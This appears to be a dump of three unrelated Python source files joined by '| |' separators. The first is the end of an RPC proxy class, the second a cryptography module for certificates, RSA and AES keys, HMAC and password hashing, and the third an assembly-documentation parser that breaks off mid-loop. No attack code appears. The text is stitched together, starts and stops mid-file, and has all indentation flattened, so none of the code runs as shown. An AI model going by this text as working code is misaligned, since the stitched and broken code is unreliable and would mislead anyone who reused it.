msg = self.make_msg('quota_commit', reservations=reservations_p)
return self.call(context, msg, version='1.41')
def quota_rollback(self, context, reservations):
reservations_p = jsonutils.to_primitive(reservations)
msg = self.make_msg('quota_rollback', reservations=reservations_p)
return self.call(context, msg, version='1.41')
def get_ec2_ids(self, context, instance):
instance_p = jsonutils.to_primitive(instance)
msg = self.make_msg('get_ec2_ids', instance=instance_p)
return self.call(context, msg, version='1.42')
def compute_stop(self, context, instance, do_cast=True):
instance_p = jsonutils.to_primitive(instance)
msg = self.make_msg('compute_stop', instance=instance_p,
do_cast=do_cast)
return self.call(context, msg, version='1.43')
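# Illustrative sketch, not part of nova: every method above follows the same
# versioned-RPC pattern -- serialize arguments to primitives, build a message
# with make_msg(), and cap the call at the API version that introduced the
# server-side method. ToyProxy is a hypothetical stand-in for
# rpc.proxy.RpcProxy so the example is self-contained.
if __name__ == '__main__':
    class ToyProxy(object):
        def make_msg(self, method, **kwargs):
            return {'method': method, 'args': kwargs}
        def call(self, context, msg, version=None, timeout=None):
            # A real proxy dispatches over the message bus; here we just
            # return what would go on the wire.
            return (msg, version)
    proxy = ToyProxy()
    msg = proxy.make_msg('instance_get', instance_id=42)
    assert proxy.call(None, msg, version='1.24') == (
        {'method': 'instance_get', 'args': {'instance_id': 42}}, '1.24')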
| |
#!/usr/bin/env python
"""Implementation of various cryptographic types."""
import binascii
import hashlib
import logging
import os
from typing import Text
from cryptography import exceptions
from cryptography import x509
from cryptography.hazmat.backends import openssl
from cryptography.hazmat.primitives import ciphers
from cryptography.hazmat.primitives import constant_time
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives import hmac
from cryptography.hazmat.primitives import padding as sym_padding
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.ciphers import algorithms
from cryptography.hazmat.primitives.ciphers import modes
from cryptography.hazmat.primitives.kdf import pbkdf2
from cryptography.x509 import oid
from grr_response_core.lib import config_lib
from grr_response_core.lib import rdfvalue
from grr_response_core.lib import type_info
from grr_response_core.lib import utils
from grr_response_core.lib.rdfvalues import standard as rdf_standard
from grr_response_core.lib.rdfvalues import structs as rdf_structs
from grr_response_core.lib.util import compatibility
from grr_response_core.lib.util import precondition
from grr_response_core.lib.util import random
from grr_response_core.lib.util import text
from grr_response_proto import jobs_pb2
class Error(Exception):
pass
class VerificationError(Error):
pass
class InvalidSignature(Error):
pass
class CipherError(rdfvalue.DecodeError):
"""Raised when decryption failed."""
class Certificate(rdf_structs.RDFProtoStruct):
protobuf = jobs_pb2.Certificate
class RDFX509Cert(rdfvalue.RDFPrimitive):
"""X509 certificates used to communicate with this client."""
def __init__(self, initializer=None):
if initializer is None:
super().__init__(None)
elif isinstance(initializer, RDFX509Cert):
super().__init__(initializer._value) # pylint: disable=protected-access
elif isinstance(initializer, x509.Certificate):
super().__init__(initializer)
elif isinstance(initializer, bytes):
try:
value = x509.load_pem_x509_certificate(
initializer, backend=openssl.backend)
except (ValueError, TypeError) as e:
raise rdfvalue.DecodeError("Invalid certificate %s: %s" %
(initializer, e))
super().__init__(value)
else:
raise rdfvalue.InitializeError("Cannot initialize %s from %s." %
(self.__class__, initializer))
if self._value is not None:
self.GetCN() # This can also raise if there isn't exactly one CN entry.
def GetRawCertificate(self):
return self._value
def GetCN(self):
subject = self._value.subject
try:
cn_attributes = subject.get_attributes_for_oid(oid.NameOID.COMMON_NAME)
if len(cn_attributes) > 1:
raise rdfvalue.DecodeError("Cert has more than 1 CN entries.")
cn_attribute = cn_attributes[0]
except IndexError:
raise rdfvalue.DecodeError("Cert has no CN")
return cn_attribute.value
def GetPublicKey(self):
return RSAPublicKey(self._value.public_key())
def GetSerialNumber(self):
return self._value.serial_number
def GetIssuer(self):
return self._value.issuer
@classmethod
def FromSerializedBytes(cls, value: bytes):
precondition.AssertType(value, bytes)
return cls(value)
@classmethod
def FromHumanReadable(cls, string: Text):
precondition.AssertType(string, Text)
return cls.FromSerializedBytes(string.encode("ascii"))
@classmethod
def FromWireFormat(cls, value):
precondition.AssertType(value, bytes)
return cls.FromSerializedBytes(value)
def SerializeToBytes(self) -> bytes:
if self._value is None:
return b""
return self._value.public_bytes(encoding=serialization.Encoding.PEM)
# TODO(user): this should return a string, since PEM format
# base64-encodes data and thus is ascii-compatible.
def AsPEM(self):
return self.SerializeToBytes()
def __str__(self) -> Text:
return self.SerializeToBytes().decode("ascii")
def Verify(self, public_key):
"""Verifies the certificate using the given key.
Args:
public_key: The public key to use.
Returns:
True: Everything went well.
Raises:
VerificationError: The certificate did not verify.
"""
# TODO(amoser): We have to do this manually for now since cryptography does
# not yet support cert verification. There is PR 2460:
# https://github.com/pyca/cryptography/pull/2460/files
# that will add it, once it's in we should switch to using this.
# Note that all times here are in UTC.
now = rdfvalue.RDFDatetime.Now().AsDatetime()
if now > self._value.not_valid_after:
raise VerificationError("Certificate expired!")
if now < self._value.not_valid_before:
raise VerificationError("Certificate not yet valid!")
public_key.Verify(
self._value.tbs_certificate_bytes,
self._value.signature,
hash_algorithm=self._value.signature_hash_algorithm)
return True
@classmethod
def ClientCertFromCSR(cls, csr):
"""Creates a new cert for the given common name.
Args:
csr: A CertificateSigningRequest.
Returns:
The signed cert.
"""
builder = x509.CertificateBuilder()
# Use the client CN for a cert serial_id. This will ensure we do
    # not have clashing cert ids.
common_name = csr.GetCN()
serial = int(common_name.split(".")[1], 16)
builder = builder.serial_number(serial)
builder = builder.subject_name(
x509.Name(
[x509.NameAttribute(oid.NameOID.COMMON_NAME, str(common_name))]))
now = rdfvalue.RDFDatetime.Now()
now_plus_year = now + rdfvalue.Duration.From(52, rdfvalue.WEEKS)
builder = builder.not_valid_after(now_plus_year.AsDatetime())
now_minus_ten = now - rdfvalue.Duration.From(10, rdfvalue.SECONDS)
builder = builder.not_valid_before(now_minus_ten.AsDatetime())
# TODO(user): dependency loop with
# grr/core/grr_response_core/config/client.py.
# pylint: disable=protected-access
ca_cert = config_lib._CONFIG["CA.certificate"]
# pylint: enable=protected-access
builder = builder.issuer_name(ca_cert.GetIssuer())
builder = builder.public_key(csr.GetPublicKey().GetRawPublicKey())
# TODO(user): dependency loop with
# grr/core/grr_response_core/config/client.py.
# pylint: disable=protected-access
ca_key = config_lib._CONFIG["PrivateKeys.ca_key"]
# pylint: enable=protected-access
return RDFX509Cert(
builder.sign(
private_key=ca_key.GetRawPrivateKey(),
algorithm=hashes.SHA256(),
backend=openssl.backend))
class CertificateSigningRequest(rdfvalue.RDFPrimitive):
"""A CSR Rdfvalue."""
def __init__(self, initializer=None, common_name=None, private_key=None):
if isinstance(initializer, CertificateSigningRequest):
super().__init__(initializer._value) # pylint: disable=protected-access
    elif isinstance(initializer, x509.CertificateSigningRequest):
super().__init__(initializer)
elif isinstance(initializer, bytes):
value = x509.load_pem_x509_csr(initializer, backend=openssl.backend)
super().__init__(value)
elif common_name and private_key:
value = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name(
[x509.NameAttribute(oid.NameOID.COMMON_NAME,
str(common_name))])).sign(
private_key.GetRawPrivateKey(),
hashes.SHA256(),
backend=openssl.backend)
super().__init__(value)
elif initializer is not None:
raise rdfvalue.InitializeError("Cannot initialize %s from %s." %
(self.__class__, initializer))
@classmethod
def FromSerializedBytes(cls, value: bytes):
precondition.AssertType(value, bytes)
return cls(value)
@classmethod
def FromWireFormat(cls, value):
precondition.AssertType(value, bytes)
return cls.FromSerializedBytes(value)
def SerializeToBytes(self) -> bytes:
if self._value is None:
return b""
return self._value.public_bytes(serialization.Encoding.PEM)
# TODO(user): this should return a string, since PEM format
# base64-encodes data and thus is ascii-compatible.
def AsPEM(self):
return self.SerializeToBytes()
def __str__(self) -> Text:
return self.SerializeToBytes().decode("ascii")
def GetCN(self):
subject = self._value.subject
try:
cn_attributes = subject.get_attributes_for_oid(oid.NameOID.COMMON_NAME)
if len(cn_attributes) > 1:
raise rdfvalue.DecodeError("CSR has more than 1 CN entries.")
cn_attribute = cn_attributes[0]
except IndexError:
raise rdfvalue.DecodeError("CSR has no CN")
return cn_attribute.value
def GetPublicKey(self):
return RSAPublicKey(self._value.public_key())
def Verify(self, public_key):
public_key.Verify(
self._value.tbs_certrequest_bytes,
self._value.signature,
hash_algorithm=self._value.signature_hash_algorithm)
return True
class RSAPublicKey(rdfvalue.RDFPrimitive):
"""An RSA public key."""
def __init__(self, initializer=None):
if isinstance(initializer, RSAPublicKey):
initializer = initializer._value # pylint: disable=protected-access
if initializer is None:
super().__init__(None)
return
if isinstance(initializer, rsa.RSAPublicKey):
super().__init__(initializer)
return
if isinstance(initializer, Text):
initializer = initializer.encode("ascii")
if isinstance(initializer, bytes):
try:
value = serialization.load_pem_public_key(
initializer, backend=openssl.backend)
super().__init__(value)
return
except (TypeError, ValueError, exceptions.UnsupportedAlgorithm) as e:
raise type_info.TypeValueError("Public key invalid: %s" % e)
raise rdfvalue.InitializeError("Cannot initialize %s from %s." %
(self.__class__, initializer))
def GetRawPublicKey(self):
return self._value
@classmethod
def FromSerializedBytes(cls, value: bytes):
precondition.AssertType(value, bytes)
return cls(value)
@classmethod
def FromWireFormat(cls, value):
precondition.AssertType(value, bytes)
return cls.FromSerializedBytes(value)
@classmethod
def FromHumanReadable(cls, string: Text):
precondition.AssertType(string, Text)
return cls.FromSerializedBytes(string.encode("ascii"))
def SerializeToBytes(self) -> bytes:
if self._value is None:
return b""
return self._value.public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo)
def GetN(self):
return self._value.public_numbers().n
def __str__(self) -> Text:
return self.SerializeToBytes().decode("ascii")
# TODO(user): this should return a string, since PEM format
# base64-encodes data and thus is ascii-compatible.
def AsPEM(self):
return self.SerializeToBytes()
def KeyLen(self):
if self._value is None:
return 0
return self._value.key_size
def Encrypt(self, message):
if self._value is None:
raise ValueError("Can't Encrypt with empty key.")
try:
return self._value.encrypt(
message,
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA1()),
algorithm=hashes.SHA1(),
label=None))
except ValueError as e:
raise CipherError(e)
def Verify(self, message, signature, hash_algorithm=None):
"""Verifies a given message."""
# This method accepts both PSS and PKCS1v15 padding. PSS is preferred but
# old clients only support PKCS1v15.
if hash_algorithm is None:
hash_algorithm = hashes.SHA256()
last_e = None
for padding_algorithm in [
padding.PSS(
mgf=padding.MGF1(hash_algorithm),
salt_length=padding.PSS.MAX_LENGTH),
padding.PKCS1v15()
]:
try:
self._value.verify(signature, message, padding_algorithm,
hash_algorithm)
return True
except exceptions.InvalidSignature as e:
last_e = e
raise VerificationError(last_e)
class RSAPrivateKey(rdfvalue.RDFPrimitive):
"""An RSA private key."""
def __init__(self, initializer=None, allow_prompt=None):
if isinstance(initializer, RSAPrivateKey):
initializer = initializer._value # pylint: disable=protected-access
if initializer is None:
super().__init__(None)
return
if isinstance(initializer, rsa.RSAPrivateKey):
super().__init__(initializer)
return
if isinstance(initializer, Text):
initializer = initializer.encode("ascii")
if not isinstance(initializer, bytes):
raise rdfvalue.InitializeError("Cannot initialize %s from %s." %
(self.__class__, initializer))
try:
value = serialization.load_pem_private_key(
initializer, password=None, backend=openssl.backend)
super().__init__(value)
return
except (TypeError, ValueError, exceptions.UnsupportedAlgorithm) as e:
if "private key is encrypted" not in str(e):
raise type_info.TypeValueError("Private key invalid: %s" % e)
# The private key is passphrase protected, we need to see if we are
# allowed to ask the user.
#
# In the case where allow_prompt was not set at all, we use the context
# we are in to see if it makes sense to ask.
if allow_prompt is None:
# TODO(user): dependency loop with
# core/grr_response_core/grr/config/client.py.
# pylint: disable=protected-access
if "Commandline Context" not in config_lib._CONFIG.context:
raise type_info.TypeValueError("Private key invalid: %s" % e)
# pylint: enable=protected-access
# Otherwise, if allow_prompt is False, we are explicitly told that we are
# not supposed to ask the user.
elif not allow_prompt:
raise type_info.TypeValueError("Private key invalid: %s" % e)
try:
# The private key is encrypted and we can ask the user for the passphrase.
password = utils.PassphraseCallback()
value = serialization.load_pem_private_key(
initializer, password=password, backend=openssl.backend)
super().__init__(value)
except (TypeError, ValueError, exceptions.UnsupportedAlgorithm) as e:
raise type_info.TypeValueError("Unable to load private key: %s" % e)
@classmethod
def FromHumanReadable(cls, string: Text):
precondition.AssertType(string, Text)
return cls.FromSerializedBytes(string.encode("ascii"))
def GetRawPrivateKey(self):
return self._value
def GetPublicKey(self):
return RSAPublicKey(self._value.public_key())
def Sign(self, message, use_pss=False):
"""Sign a given message."""
precondition.AssertType(message, bytes)
# TODO(amoser): This should use PSS by default at some point.
if not use_pss:
padding_algorithm = padding.PKCS1v15()
else:
padding_algorithm = padding.PSS(
mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH)
return self._value.sign(message, padding_algorithm, hashes.SHA256())
def Decrypt(self, message):
if self._value is None:
raise ValueError("Can't Decrypt with empty key.")
try:
return self._value.decrypt(
message,
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA1()),
algorithm=hashes.SHA1(),
label=None))
except ValueError as e:
raise CipherError(e)
@classmethod
def GenerateKey(cls, bits=2048, exponent=65537):
key = rsa.generate_private_key(
public_exponent=exponent, key_size=bits, backend=openssl.backend)
return cls(key)
@classmethod
def FromSerializedBytes(cls, value: bytes):
precondition.AssertType(value, bytes)
return cls(value)
@classmethod
def FromWireFormat(cls, value):
precondition.AssertType(value, bytes)
return cls(value)
def SerializeToBytes(self) -> bytes:
if self._value is None:
return b""
return self._value.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.TraditionalOpenSSL,
encryption_algorithm=serialization.NoEncryption())
def __str__(self) -> Text:
digest = hashlib.sha256(self.AsPEM()).hexdigest()
# TODO: `hexdigest` returns a unicode object in Python 3, but
# bytes object in Python 2. Once support for Python 2 is dropped, this can
# be safely removed.
if compatibility.PY2:
digest = digest.decode("ascii") # pytype: disable=attribute-error
return "%s (%s)" % (compatibility.GetName(self.__class__), digest)
# TODO(user): this should return a string, since PEM format
# base64-encodes data and thus is ascii-compatible.
def AsPEM(self):
return self.SerializeToBytes()
def AsPassphraseProtectedPEM(self, passphrase):
if self._value is None:
return ""
return self._value.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.TraditionalOpenSSL,
encryption_algorithm=serialization.BestAvailableEncryption(passphrase))
def KeyLen(self):
if self._value is None:
return 0
return self._value.key_size
# TODO(amoser): Get rid of those.
# Conserve old names for backwards compatibility.
class PEMPrivateKey(RSAPrivateKey):
pass
class PEMPublicKey(RSAPublicKey):
pass
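# Illustrative sketch, not part of the original module: a round trip through
# the RSA helpers above, using the same cryptography dependencies as the rest
# of this file. The key size and messages are arbitrary.
def _rsa_example():
  private_key = RSAPrivateKey.GenerateKey(bits=2048)
  public_key = private_key.GetPublicKey()
  # Sign() defaults to PKCS1v15 with SHA-256; Verify() accepts PSS or
  # PKCS1v15 and raises VerificationError on mismatch.
  signature = private_key.Sign(b"some message")
  assert public_key.Verify(b"some message", signature)
  # OAEP encryption with the public key, decryption with the private key.
  assert private_key.Decrypt(public_key.Encrypt(b"secret")) == b"secret"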
class Hash(rdf_structs.RDFProtoStruct):
"""A hash object containing multiple digests."""
protobuf = jobs_pb2.Hash
rdf_deps = [
rdf_standard.AuthenticodeSignedData,
rdfvalue.HashDigest,
]
__hash__ = rdfvalue.RDFValue.__hash__
class SignedBlob(rdf_structs.RDFProtoStruct):
"""A signed blob.
The client can receive and verify a signed blob (e.g. driver or executable
binary). Once verified, the client may execute this.
"""
protobuf = jobs_pb2.SignedBlob
def Verify(self, public_key):
"""Verify the data in this blob.
Args:
public_key: The public key to use for verification.
Returns:
True when verification succeeds.
Raises:
      rdfvalue.DecodeError: If the data could not be verified.
"""
if self.digest_type != self.HashType.SHA256:
raise rdfvalue.DecodeError("Unsupported digest.")
if self.signature_type not in [
self.SignatureType.RSA_PKCS1v15, self.SignatureType.RSA_PSS
]:
raise rdfvalue.DecodeError("Unsupported signature type.")
try:
public_key.Verify(self.data, self.signature)
except InvalidSignature as e:
raise rdfvalue.DecodeError("Could not verify blob. Error: %s" % e)
return True
def Sign(self, data, signing_key, verify_key=None):
"""Use the data to sign this blob.
Args:
data: String containing the blob data.
signing_key: The key to sign with.
verify_key: Key to verify with. If None we assume the signing key also
contains the public key.
Returns:
self for call chaining.
"""
if signing_key.KeyLen() < 2048:
logging.warning("signing key is too short.")
self.signature = signing_key.Sign(data)
self.signature_type = self.SignatureType.RSA_PKCS1v15
self.digest = hashlib.sha256(data).digest()
self.digest_type = self.HashType.SHA256
self.data = data
# Test we can verify before we send it off.
if verify_key is None:
verify_key = signing_key.GetPublicKey()
# Verify our own data.
self.Verify(verify_key)
return self
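# Illustrative sketch, not part of the original module: signing a payload into
# a SignedBlob and verifying it with the matching public key. Sign() already
# verifies its own output before returning self.
def _signed_blob_example():
  signing_key = RSAPrivateKey.GenerateKey()
  blob = SignedBlob().Sign(b"payload bytes", signing_key)
  assert blob.Verify(signing_key.GetPublicKey())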
class EncryptionKey(rdfvalue.RDFPrimitive):
"""Base class for encryption keys."""
protobuf_type = "bytes"
def __init__(self, initializer=None):
if initializer is None:
super().__init__(b"")
elif isinstance(initializer, EncryptionKey):
super().__init__(initializer.RawBytes())
else:
precondition.AssertType(initializer, bytes)
if len(initializer) % 8:
raise CipherError("Invalid key length %d (%s)." %
(len(initializer) * 8, initializer))
super().__init__(initializer)
self.length = 8 * len(self._value)
if 0 < self.length < 128: # Check length if _value is not empty.
raise CipherError("Key too short (%d): %s" % (self.length, initializer))
@classmethod
def FromWireFormat(cls, value):
precondition.AssertType(value, bytes)
return cls(value)
@classmethod
def FromSerializedBytes(cls, value: bytes):
precondition.AssertType(value, bytes)
return cls(value)
@classmethod
def FromHumanReadable(cls, string: Text):
precondition.AssertType(string, Text)
return cls(binascii.unhexlify(string))
def __str__(self) -> Text:
return "%s (%s)" % (self.__class__.__name__, self.AsHexDigest())
def __len__(self) -> int:
return len(self._value)
def AsHexDigest(self) -> Text:
return text.Hexify(self._value)
def SerializeToBytes(self):
return self._value
@classmethod
def GenerateKey(cls, length=128):
return cls(os.urandom(length // 8))
@classmethod
def GenerateRandomIV(cls, length=128):
return cls.GenerateKey(length=length)
def RawBytes(self):
return self._value
# TODO(amoser): Size is now flexible, this class makes no sense anymore.
class AES128Key(EncryptionKey):
length = 128
class AutoGeneratedAES128Key(AES128Key):
"""Like AES128Key, but its UI edit box is prefilled with generated key."""
def __init__(self, initializer=None, **kwargs):
if isinstance(initializer, AES128Key):
super().__init__(initializer=initializer.RawBytes(), **kwargs)
else:
super().__init__(initializer=initializer, **kwargs)
class StreamingCBCEncryptor(object):
"""A class to stream data to a CBCCipher object."""
def __init__(self, cipher):
self._cipher = cipher
self._encryptor = cipher.GetEncryptor()
self._overflow_buffer = b""
self._block_size = len(cipher.key)
def Update(self, data):
data = self._overflow_buffer + data
overflow_count = len(data) % self._block_size
length_to_encrypt = len(data) - overflow_count
to_encrypt = data[:length_to_encrypt]
self._overflow_buffer = data[length_to_encrypt:]
return self._encryptor.update(to_encrypt)
def Finalize(self):
res = self._encryptor.update(self._cipher.Pad(self._overflow_buffer))
res += self._encryptor.finalize()
return res
class AES128CBCCipher(object):
"""A Cipher using AES128 in CBC mode and PKCS7 for padding."""
algorithm = None
def __init__(self, key, iv):
"""Init.
Args:
key: The key, a rdf_crypto.EncryptionKey instance.
iv: The iv, a rdf_crypto.EncryptionKey instance.
"""
self.key = key.RawBytes()
self.iv = iv.RawBytes()
def Pad(self, data):
padder = sym_padding.PKCS7(128).padder()
return padder.update(data) + padder.finalize()
def UnPad(self, padded_data):
unpadder = sym_padding.PKCS7(128).unpadder()
return unpadder.update(padded_data) + unpadder.finalize()
def GetEncryptor(self):
return ciphers.Cipher(
algorithms.AES(self.key), modes.CBC(self.iv),
backend=openssl.backend).encryptor()
def Encrypt(self, data):
"""A convenience method which pads and encrypts at once."""
encryptor = self.GetEncryptor()
padded_data = self.Pad(data)
try:
return encryptor.update(padded_data) + encryptor.finalize()
except ValueError as e:
raise CipherError(e)
def GetDecryptor(self):
return ciphers.Cipher(
algorithms.AES(self.key), modes.CBC(self.iv),
backend=openssl.backend).decryptor()
def Decrypt(self, data):
"""A convenience method which pads and decrypts at once."""
decryptor = self.GetDecryptor()
try:
padded_data = decryptor.update(data) + decryptor.finalize()
return self.UnPad(padded_data)
except ValueError as e:
raise CipherError(e)
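# Illustrative sketch, not part of the original module: a CBC round trip plus
# the equivalent chunked encryption through StreamingCBCEncryptor. Both paths
# produce identical ciphertext because they share the same key and IV.
def _aes_cbc_example():
  key = EncryptionKey.GenerateKey(length=128)
  iv = EncryptionKey.GenerateRandomIV(length=128)
  cipher = AES128CBCCipher(key, iv)
  ciphertext = cipher.Encrypt(b"hello world")
  assert cipher.Decrypt(ciphertext) == b"hello world"
  # Stream in chunks, then Finalize() to pad and flush the remainder.
  streamer = StreamingCBCEncryptor(cipher)
  streamed = streamer.Update(b"hello ") + streamer.Update(b"world")
  streamed += streamer.Finalize()
  assert streamed == ciphertext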
class SymmetricCipher(rdf_structs.RDFProtoStruct):
"""Abstract symmetric cipher operations."""
protobuf = jobs_pb2.SymmetricCipher
rdf_deps = [
EncryptionKey,
]
@classmethod
def Generate(cls, algorithm):
if algorithm != cls.Algorithm.AES128CBC:
raise RuntimeError("Algorithm not supported.")
return cls(
_algorithm=algorithm,
_key=EncryptionKey.GenerateKey(length=128),
_iv=EncryptionKey.GenerateKey(length=128))
def _get_cipher(self):
if self._algorithm != self.Algorithm.AES128CBC:
raise CipherError("Unknown cipher type %s" % self._algorithm)
return AES128CBCCipher(self._key, self._iv)
def Encrypt(self, data):
if self._algorithm == self.Algorithm.NONE:
raise TypeError("Empty encryption is not allowed.")
return self._get_cipher().Encrypt(data)
def Decrypt(self, data):
if self._algorithm == self.Algorithm.NONE:
raise TypeError("Empty encryption is not allowed.")
return self._get_cipher().Decrypt(data)
class HMAC(object):
"""A wrapper for the cryptography HMAC object."""
def __init__(self, key, use_sha256=False):
# We store the raw key from cryptography.io.
if isinstance(key, EncryptionKey):
key = key.RawBytes()
self.key = key
self._hmac = self._NewHMAC(use_sha256=use_sha256)
def _NewHMAC(self, use_sha256=False):
if use_sha256:
hash_algorithm = hashes.SHA256()
else:
hash_algorithm = hashes.SHA1()
return hmac.HMAC(self.key, hash_algorithm, backend=openssl.backend)
def Update(self, data):
self._hmac.update(data)
def Finalize(self):
return self._hmac.finalize()
def HMAC(self, message, use_sha256=False):
"""Calculates the HMAC for a given message."""
h = self._NewHMAC(use_sha256=use_sha256)
h.update(message)
return h.finalize()
def Verify(self, message, signature):
"""Verifies the signature for a given message."""
siglen = len(signature)
if siglen == 20:
hash_algorithm = hashes.SHA1()
elif siglen == 32:
hash_algorithm = hashes.SHA256()
else:
raise VerificationError("Invalid signature length %d." % siglen)
h = hmac.HMAC(self.key, hash_algorithm, backend=openssl.backend)
h.update(message)
try:
h.verify(signature)
return True
except exceptions.InvalidSignature as e:
raise VerificationError(e)
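# Illustrative sketch, not part of the original module: MACing a message and
# checking the tag. Verify() infers SHA-1 vs SHA-256 from the tag length and
# raises VerificationError on a bad tag.
def _hmac_example():
  mac = HMAC(b"0123456789abcdef", use_sha256=True)
  tag = mac.HMAC(b"message", use_sha256=True)
  assert len(tag) == 32
  assert mac.Verify(b"message", tag)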
class Password(rdf_structs.RDFProtoStruct):
"""A password stored in the database."""
protobuf = jobs_pb2.Password
def _CalculateHash(self, password, salt, iteration_count):
kdf = pbkdf2.PBKDF2HMAC(
algorithm=hashes.SHA256(),
length=32,
salt=salt,
iterations=iteration_count,
backend=openssl.backend)
return kdf.derive(password)
def SetPassword(self, password):
self.salt = b"%016x" % random.UInt64()
self.iteration_count = 100000
# prevent non-descriptive 'key_material must be bytes' error later
if isinstance(password, Text):
password = password.encode("utf-8")
self.hashed_pwd = self._CalculateHash(password, self.salt,
self.iteration_count)
def CheckPassword(self, password):
# prevent non-descriptive 'key_material must be bytes' error later
if isinstance(password, Text):
password = password.encode("utf-8")
h = self._CalculateHash(password, self.salt, self.iteration_count)
return constant_time.bytes_eq(h, self.hashed_pwd)
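# Illustrative sketch, not part of the original module: PBKDF2-backed password
# storage. SetPassword() derives a salted hash; CheckPassword() re-derives it
# and compares in constant time.
def _password_example():
  pwd = Password()
  pwd.SetPassword("hunter2")
  assert pwd.CheckPassword("hunter2")
  assert not pwd.CheckPassword("wrong")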
| |
#!/usr/bin/env python
# vim: sw=4 ts=4 et smarttab encoding=UTF-8
from __future__ import print_function
import sys, subprocess, shlex
from copy import deepcopy
BLACK, R, G, Y, B, M, C = ["\x1b[3"+str(x)+"m" for x in range(0, 7)]
N = "\x1b[0m"
class Regs(object):
valids = (['rax', 'rbx', 'rcx', 'rdx', 'rdi', 'rsi', 'rbp'] +
['r' + str(i) for i in range(8, 16)] + ['*'])
def __init__(self, regs, parent=None):
        if isinstance(regs, set):
            self.regs = regs
        elif isinstance(regs, str):
            self.regs = set([x.strip() for x in regs.split(",")
                if x.strip() != ''])
else:
raise Exception("Unexpected regs type " + str(type(regs)) +
" for regs " + str(regs))
for r in self.regs:
if r not in self.valids:
print(parent.file if parent else "")
raise Exception("Invalid register " + r)
def __str__(self):
if '*' in self.regs:
return '*'
        x = sorted(self.regs, key=self.valids.index)
return ', '.join(x)
def __eq__(self, x):
assert isinstance(x, Regs)
return str(self) == str(x)
def __ne__(self, x):
return not (self == x)
def __repr__(self):
return "Regs(\"" + str(self) + "\")"
def __len__(self):
return len(self.regs)
def __add__(self, y):
assert isinstance(y, Regs)
return Regs(self.regs | y.regs)
def __sub__(self, y):
assert isinstance(y, Regs)
if '*' in y.regs:
return Regs(set([]))
return Regs(self.regs - y.regs)
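# Illustrative sketch, not part of the original tool: Regs is a small register
# set algebra -- '+' unions two sets, '-' subtracts, and the '*' wildcard
# absorbs everything it is subtracted from.
def _regs_example():
    used = Regs("rax, rbx, rcx")
    kept = Regs("rbx")
    assert str(used - kept) == "rax, rcx"
    assert len(Regs("rax") - Regs("*")) == 0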
# TODO: Full blown type handling.
class Subtype(object):
def __init__(self, type):
self.type = type
def __str__(self):
return self.type
class Type(object):
def __init__(self, type):
self.type = [Subtype(x.strip()) for x in type.split("->")
if x.strip() != '']
def __str__(self):
return " -> ".join(str(t) for t in self.type)
def __len__(self):
return len(self.type)
class Proc(object):
def __init__(self, parent, title, desc, file, line, cur):
self.aliases = []
self.parent = parent
self.title = title
self.description = desc
self.file = file
self.line = line
if ':' in cur:
cur[':'] = Type(cur[':'])
else:
cur[':'] = Type("")
if '=' in cur:
self.aliases += [x.strip() for x in cur['='].split(',')]
if '-' in cur:
cur['-'] = Regs(cur['-'], self)
else:
cur['-'] = Regs("*")
if '+' in cur:
cur['+'] = Regs(cur['+'])
else:
cur['+'] = Regs("")
if '.' in cur:
            cur['.'] = [x.strip() for x in cur['.'].split(',')]
else:
cur['.'] = []
if ' ' not in cur:
cur[' '] = ''
self.cur = cur
self.full = self.cur[' ']
self.type = self.cur[':']
self.uses = self.cur['.']
self.keepregs = self.cur['+']
self.useregs = self.cur['-']
    def get_consumption(self, past=None):
        past = past or []
        rs = deepcopy(self.useregs)
for p in self.uses:
if p not in past:
if p not in self.parent.procs:
raise Exception("Proc " + self.title + " refers to"+
" nonexisting proc " + p)
rs += self.parent.procs[p].get_consumption(past + [self.title])
rs = rs - self.keepregs
return rs
def prettyprint(self, file = False, full=False):
E = N + "\n"
o = ""
o += M + self.title + N + ":"
o += E + ";!\t" + self.description
if file:
o += E + "; FILE\t" + G + self.file + N + ":" + R + str(self.line)
if self.type:
o += E + ";:\t" + C + str(self.type)
if len(self.keepregs) > 0:
o += E + ";+\t" + G + str(self.keepregs)
if len(self.useregs - self.keepregs) > 0:
o += E + ";-\t" + R + str(self.useregs)
if (self.useregs - self.keepregs) != self.get_consumption():
o += E + ";- TOT:\t" + R + str(self.get_consumption())
if full and self.aliases:
o += E + ";=\t" + M + ", ".join(self.aliases)
if full and self.full.strip():
o += E + "; " + Y + (E + "; " + Y).join(self.full.strip().split('\n'))
return o + N
def __str__(self):
return self.prettyprint()
class YHBTDoc(object):
    def _titlify(self, line, clas, ctx):
        def f(name):
            if clas == '':
                return name
            return clas + '.' + name
        if line[0:4] == "proc":
            return f(line.split(',')[1].strip())
        if line[0:7] == "intproc":
            return f(line[8:].split(',')[0].strip())
        if line[0:5] == "macro" or line[0:5] == "class":
            return line[6:].split(" ")[0]
        if len(line) > 0 and line[-1] == ':':
            return f(line.strip()[:-1])
        raise Exception("Couldn't find the name of \"" + line + "\", " + repr(ctx))
def __init__(self):
_ = subprocess.Popen(
shlex.split("find . -iname '*.asm' -print0 -o -iname '*.h' -print0"),
stdout=subprocess.PIPE)
self.files = _.stdout.read().split('\0')
self.procs = {} # Map (String procname) Proc
self.fprocs = {} # Map (String file) (Map (String procname=) Proc)
self.fdocs = {} # Map (String filename) (String file level documentation)
ctx = ("", "")
for f in self.files:
if f == '': continue
lines = map(lambda x: x.strip(), open(f).read().split('\n'))
comment = False
clas = ""
desc = ""
cur = {}
lnum = 0
for l in lines:
didit = False
ctx = (f, lnum+1)
if l[0:2] == ";!": # Start of a comment block
desc = l[2:].strip()
comment = True
if comment == True and l[0:1] != ';': # End of a comment block
comment = False
titles = [self._titlify(l, clas, ctx)]
cur["file"] = f
proc = Proc(self, titles[0], desc, f, lnum, cur)
titles += proc.aliases
                for title in titles:
                    self.procs[title] = proc
self.fprocs.setdefault(f, {})[titles[0]] = proc
cur = {}
didit = True
if comment == True: # Add to a comment block.
if len(l) > 2:
cur[l[1]] = (cur.get(l[1], "") + l[2:] + '\n')
if l[0:2] == ";;": # File level comment
